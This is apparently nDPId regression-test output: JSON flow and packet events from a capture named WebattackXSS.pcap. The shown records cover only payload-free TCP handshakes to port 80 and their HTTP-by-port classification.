+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8895,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":2,"flow_last_seen":1499348041088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348041088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQig7ecTfrWlqX5KAScSD19wAAAgQFtAQCCAoD5tGhAT0ALQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":3,"flow_last_seen":1499348041088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l89AAD4GLgmsEAABwKgKMooOAFBaWpfk3nE37IAQAOWU\/wAAAQEICgE9AC0D5tGh"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348042384,"flow_last_seen":1499348042384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348042384,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1499348042384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348042384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rjZAAD4GF5qsEAABwKgKMoocAFClJq9HAAAAAKACchB9ewAAAgQFtAQCCAoBPQFxAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":2,"flow_last_seen":1499348042384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348042384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQihw9by\/zpSavSKAScSA6LAAAAgQFtAQCCAoD5tLlAT0BcQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":3,"flow_last_seen":1499348042385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348042385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rjdAAD4GF6GsEAABwKgKMoocAFClJq9IPW8v9IAQAOXZMwAAAQEICgE9AXED5tLl"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348043670,"flow_last_seen":1499348043670,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348043670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1499348043670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348043670,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cMNAAD4GVQ2sEAABwKgKMooqAFAsTnJwAAAAAKACchAx2wAAAgQFtAQCCAoBPQKzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":2,"flow_last_seen":1499348043670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348043670,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiirQJ1Z6LE5ycaAScSA0CwAAAgQFtAQCCAoD5tQmAT0CswEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":3,"flow_last_seen":1499348043671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348043671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cMRAAD4GVRSsEAABwKgKMooqAFAsTnJx0CdWe4AQAOXTEgAAAQEICgE9ArMD5tQm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8933,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348046262,"flow_last_seen":1499348046262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348046262,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8933,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1499348046262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348046262,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bZhAAD4GWDisEAABwKgKMopEAFAJXWijAAAAAKACchBb9wAAAgQFtAQCCAoBPQU7AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8934,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":2,"flow_last_seen":1499348046262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348046262,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQikQJGz7wCV1opKAScSA6NQAAAgQFtAQCCAoD5tavAT0FOwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8935,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":3,"flow_last_seen":1499348046263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348046263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bZlAAD4GWD+sEAABwKgKMopEAFAJXWikCRs+8YAQAOXZPAAAAQEICgE9BTsD5tav"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348047547,"flow_last_seen":1499348047547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348047547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1499348047547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348047547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PrNAAD4Ghx2sEAABwKgKMopSAFC7TzjPAAAAAKACchDYiQAAAgQFtAQCCAoBPQZ8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":2,"flow_last_seen":1499348047547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348047547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQilKBYq9Yu0840KAScSDM1gAAAgQFtAQCCAoD5tfwAT0GfAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":3,"flow_last_seen":1499348047547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348047547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PrRAAD4GhySsEAABwKgKMopSAFC7TzjQgWKvWYAQAOVr3gAAAQEICgE9BnwD5tfw"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348050079,"flow_last_seen":1499348050079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050079,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1499348050079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348050079,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Gn1AAD4Gq1OsEAABwKgKMopsAFCVUBKIAAAAAKACchAiPQAAAgQFtAQCCAoBPQj1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":2,"flow_last_seen":1499348050079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348050079,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQimww3+sulVASiaAScSAovgAAAgQFtAQCCAoD5tppAT0I9QEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":3,"flow_last_seen":1499348050080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348050080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gn5AAD4Gq1qsEAABwKgKMopsAFCVUBKJMN\/rL4AQAOXHxQAAAQEICgE9CPUD5tpp"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348051362,"flow_last_seen":1499348051362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348051362,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1499348051362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ntRAAD4GJvysEAABwKgKMop6AFCG4ZTiAAAAAKACchCtAgAAAgQFtAQCCAoBPQo2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":2,"flow_last_seen":1499348051362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348051362,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQinqx2HVxhuGU46AScSCnBwAAAgQFtAQCCAoD5tupAT0KNgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":3,"flow_last_seen":1499348051362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ntVAAD4GJwOsEAABwKgKMop6AFCG4ZTjsdh1coAQAOVGDwAAAQEICgE9CjYD5tup"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8987,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348052641,"flow_last_seen":1499348052641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348052641,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8987,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1499348052641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348052641,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/xAAD4GNdSsEAABwKgKMoqIAFBipISJAAAAAKACchDgSwAAAgQFtAQCCAoBPQt1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8988,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":2,"flow_last_seen":1499348052641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348052641,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiogIs7XwYqSEiqAScSBBtwAAAgQFtAQCCAoD5tzpAT0LdQEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":3,"flow_last_seen":1499348052642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348052642,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/1AAD4GNdusEAABwKgKMoqIAFBipISKCLO18YAQAOXgvQAAAQEICgE9C3YD5tzp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348055228,"flow_last_seen":1499348055228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348055228,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1499348055228,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348055228,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0hAAD4GaoisEAABwKgKMoqiAFBaIFa0AAAAAKACchAUBAAAAgQFtAQCCAoBPQ38AAAAAAEDAwc="} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":2,"flow_last_seen":1499348055228,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348055228,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiqK\/mxmbWiBWtaAScSBYVQAAAgQFtAQCCAoD5t9wAT0N\/AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9007,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":3,"flow_last_seen":1499348055229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348055229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W0lAAD4Gao+sEAABwKgKMoqiAFBaIFa1v5sZnIAQAOX3XAAAAQEICgE9DfwD5t9w"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348056534,"flow_last_seen":1499348056534,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348056534,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1499348056534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348056534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LdZAAD4Gl\/qsEAABwKgKMoqwAFDDZCKVAAAAAKACchDdiQAAAgQFtAQCCAoBPQ9DAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9018,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":2,"flow_last_seen":1499348056535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348056535,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQirDnT6dMw2QilqAScSBrLgAAAgQFtAQCCAoD5uC3AT0PQwEDAwc="} 